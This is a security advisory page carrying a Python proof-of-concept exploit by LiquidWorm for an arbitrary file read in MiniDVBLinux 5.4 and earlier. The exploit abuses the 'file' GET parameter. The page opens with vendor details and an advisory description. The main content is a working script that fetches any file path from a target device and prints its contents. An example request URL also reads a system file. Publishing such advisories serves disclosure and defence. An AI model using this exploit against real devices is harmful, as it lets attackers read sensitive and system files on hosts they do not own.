MiniDVBLinux 5.4 Arbitrary File Read

2022.10.18
Credit: LiquidWorm
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: CWE-200

#!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Arbitrary File Read Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The distribution suffers from an arbitrary file disclosure # vulnerability. Using the 'file' GET parameter attackers can disclose # arbitrary files on the affected device and disclose sensitive and system # information. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5719 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php # # # 24.09.2022 # import requests import re,sys #test case 001 #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT if len(sys.argv) < 3: print('MiniDVBLinux 5.4 File Disclosure PoC') print('Usage: ./mldhd_fd.py [url] [file]') sys.exit(17) else: url = sys.argv[1] fil = sys.argv[2] req = requests.get(url+'/?site=about&name=ZSL&file='+fil) outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group() print(outz.replace('<pre>','').replace('</pre>',''))


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top